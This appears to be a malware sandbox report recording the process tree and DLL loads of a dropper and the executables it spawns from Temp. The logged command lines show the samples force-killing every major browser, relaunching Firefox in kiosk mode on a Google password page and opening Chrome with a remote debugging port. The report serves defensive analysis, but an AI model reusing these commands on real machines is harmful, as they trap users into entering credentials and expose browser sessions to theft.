Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe "C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe"
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8144 -s 1564
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe "C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe"
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe "C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe "C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe "C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe "C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe "C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe "C:\Users\user\AppData\Local\Temp\1008766001\19cf1f0449.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Process created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe "C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Process created: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe "C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 --field-trial-handle=2068,i,137062989363131379,3334334011690293707,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2244 -prefMapHandle 2240 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {78dc1d96-0b76-4467-b815-40c13a0cb6b1} 6680 "\\.\pipe\gecko-crash-server-pipe.6680" 1d53a26dd10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4016 -parentBuildID 20230927232528 -prefsHandle 4128 -prefMapHandle 3956 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {001f3511-2f2e-4cf9-832b-7aa384c4ffa9} 6680 "\\.\pipe\gecko-crash-server-pipe.6680" 1d54c386410 rdd
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008765001\d986826e57.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: webio.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008758001\a7f098a093.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Section loaded: sspicli.dll
